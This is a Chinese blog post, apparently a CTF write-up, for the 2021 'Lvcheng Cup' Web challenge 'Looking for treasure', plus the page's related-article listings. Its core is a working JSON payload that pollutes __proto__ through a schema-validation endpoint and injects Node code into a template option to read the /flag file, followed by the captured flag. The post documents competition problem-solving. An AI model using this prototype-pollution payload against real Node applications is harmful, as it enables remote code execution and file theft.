2021年“绿城杯”网络安全大赛-Web-Looking for treasure

最新推荐文章于 2023-06-30 11:12:50 发布
最新推荐文章于 2023-06-30 11:12:50 发布
阅读量1.4k 收藏 2
点赞数 1
分类专栏: 2021年“绿城杯”网络安全大赛 文章标签: 网络安全 2021年“绿城杯” unctf Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43264813/article/details/120557486
版权
"本文详细介绍了2021年'绿城杯'网络安全大赛中名为'Lookingfortreasure'的Web题目。该题目属于中等难度,涉及JSON注入技术,通过提供的payload,参赛者可以获取到flag,其值为'DASCTF{443a3172111bb28cd26f6eae1a90ea1a}
摘要由CSDN通过智能技术生成

2021年“绿城杯”网络安全大赛-Web-Looking for treasure

题目名称:Looking for treasure
题目内容:从中找到宝藏题目分值:200.0
题目难度:中等
相关附件:Looking for treasure的附件6.txt

解题思路:

1.原题直接附上payload

POST /validated/json-schema/validate
Content-Type: application/json
{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"outputFunctionName":{"type":"string","default":"x;var buf = Buffer.alloc(128);var fs = process.mainModule.require(`fs`);var fd=fs.openSync(`/fl`+`ag`);fs.readSync(fd, buf, 0, 128);fs.closeSync(fd);return buf.toString();//x"},"path":{"type":"string","default":"/foo"}}}}}}

2.拿到flag

DASCTF{443a3172111bb28cd26f6eae1a90ea1a}

在这里插入图片描述

夜白君
关注
专栏目录
绿城2021 Crypto writeups
weixin_56678592的博客
09-29 523
绿城2021 Crypto writeups #1 warmup: 题目: from Crypto.Util.number import * from flag import flag assert flag[:5]=='flag{' str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' def encode(plain_text, a, b, m): cipher_text = '' for i in plain_tex
2021绿城Light1ng战队Writeup
Le1a's Blog
09-30 3220
Light1ng战队 一、战队信息 名称:Light1ng 排名:16 二、解题情况 进不去平台了,没法截图了 三、解题过程 Web 1.ezphp ezphp 在关于里看到个Git,所以考虑存在git泄露 index.php里的php代码 <?php if (isset($_GET['link_page'])) { $link_page = $_GET['link_page']; } else { $link_page = "home"; } $page_file = "pages/"
2021绿城网络安全大赛
09-30
2021绿城网络安全大赛
2021“莲城网络安全大赛-Web-Minesweepe
qq_43264813的博客
10-12 2237
2021“莲城网络安全大赛-Web-Minesweepe 题目名称:Minesweepe 题目内容:扫个雷吧,三个难度都通关了即可获得flag哦.靶机:183.129.189.60:10005 题目分值:100.0 题目难度:容易 解题思路: 1.查看源代码 js代码打开 2.定位通关,查到关键flag字符 _0x4cf3('0x1','2$t7')+_0x4cf3('0x3','1vj%')+_0x4cf3('0x5','@2yf') 3.控制台运行输出flag DASCTF{c4a204599
中职磐云网络安全大赛-------隐藏信息探索
旺仔Sec&blog
07-27 1349
中的网站进行访问,登录成功后找到页面中的十字星,将十字星中页面内容进行下载,将下载到的文件解密,并将解密后的文件内容作为FLAG提交。中的网站进行访问,在登录界面中登录,登录失败后找到页面中的链接访问连接并下载文件,将文件中隐藏信息文件的内容作为FLAG提交。中的网站进行访问,在登录界面中登录,登录失败后找到页面中的链接访问连接并下载文件,将文件中的隐藏文件全称作为FLAG提交。中的网站进行访问,登录成功后找到页面中的月亮,将月亮中的信息解密,并将。通过本地PC中渗透测试平台Kali对服务器场景。
2021“绿盟”重庆市大学生信息安全竞赛线上赛-Writeup
末初的CSDN博客
10-24 4055
2021绿盟重庆市大学生信息安全竞赛
2021“绿盟”重庆市大学生信息安全竞赛部分wp
qq_36410265的博客
12-27 938
2021“绿盟”重庆市大学生信息安全竞赛部分wp
WP-2021绿盟-藏宝图
bin789456的博客
11-02 763
WP 非常有意思,将这个题记下来吧。首先进去是一个藏宝图的界面,然后界面上没啥东西。源代码和包是这样的: 这里是第一关已经解出来的一个包。它的要求比较简单,将这个secret连接user再md5就可以了。 传进去,如上图,就重定向到了cangbaoxiang.php 藏宝箱第二关就难一些了: 以下是它的源码: <link rel="stylesheet" href="css\cangbaoxiang.css"> </head> <body> <f
网络安全竞赛—隐藏信息探索解析教程
旺仔Sec&blog
04-27 601
中的网站进行访问,登录成功后找到页面中的十字星,将十字星中页面内容进行下载,将下载到的文件解密,并将解密后的文件内容作为FLAG提交。中的网站进行访问,在登录界面中登录,登录失败后找到页面中的链接访问连接并下载文件,将文件中隐藏信息文件的内容作为FLAG提交。中的网站进行访问,在登录界面中登录,登录失败后找到页面中的链接访问连接并下载文件,将文件中的隐藏文件全称作为FLAG提交。中的网站进行访问,登录成功后找到页面中的月亮,将月亮中的信息解密,并将。通过本地PC中渗透测试平台Kali对服务器场景。
HAN-OOPD-Diving-For-Treasure:OOPD的学校项目-潜水宝藏(续集)
03-27
在这个名为“HAN-OOPD-Diving-For-Treasure”的项目中,我们可以看到这是一个针对对象导向编程设计(Object-Oriented Programming Design, OOPD)的学校项目,特别是使用Java语言来实现的。这个“续集”可能是指对...
babel-plugin-treasure:基于 babel-plugin-import ,致力于实现统一库的AST优化需求
05-30
babel-plugin-treasure 基于babel-plugin-import,我们致力于实现统一库的AST优化需求,响应各种AST节点修改操作的需求。 目前使用统一方便的方式解决任意组件库的按需加载需求 与 babel-plugin-import 的区别 优化...
Treasure-huntAR:SF-Hacks 2021
05-07
此仓库包含我们团队对2021SF-Hacks Hackathon的echoAR挑战的提交。 动机 利用增强现实技术使教育互动和令人兴奋 我们用了什么 HTML,Bootstrap,CSS,SCSS,JavaScript echoAR API和模型 文件说明 附加了要在...
td-android-sdk:Android SDK for Treasure Data
05-14
使用此SDK,您可以轻松地将Android和Android TV应用程序上的事件导入Treasure Data。 安装 您可以通过以下方式将td-android-sdk安装到Android项目中。 Gradle 如果使用gradle,请将以下依赖项添加到build.gradle中...
网络安全带你练爬虫-100练】第1练:发送请求获取返回内容
06-30 8650
网络安全爬虫】从0带你练py爬虫
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8482
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
前端初始化资源包初始化前端
10-01
.....................
vmware ubuntu22.04安装教程.docx
最新发布
10-01
vmware ubuntu22.04安装教程
语音处理相关的代码------matlab实现_______________开箱即用_soundProcess.zip
10-01
语音处理相关的代码------matlab实现_______________开箱即用_soundProcess
intra-mart产品定制与混合编程指南
"产品定制-matlab与c_c++混合编程 张亮 等编 2008" 本文档主要介绍了如何在intra-mart平台上进行产品定制,包括定制的规定、环境移行的步骤以及注意事项。intra-mart允许用户对公开源代码的程序进行自由定制,但...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值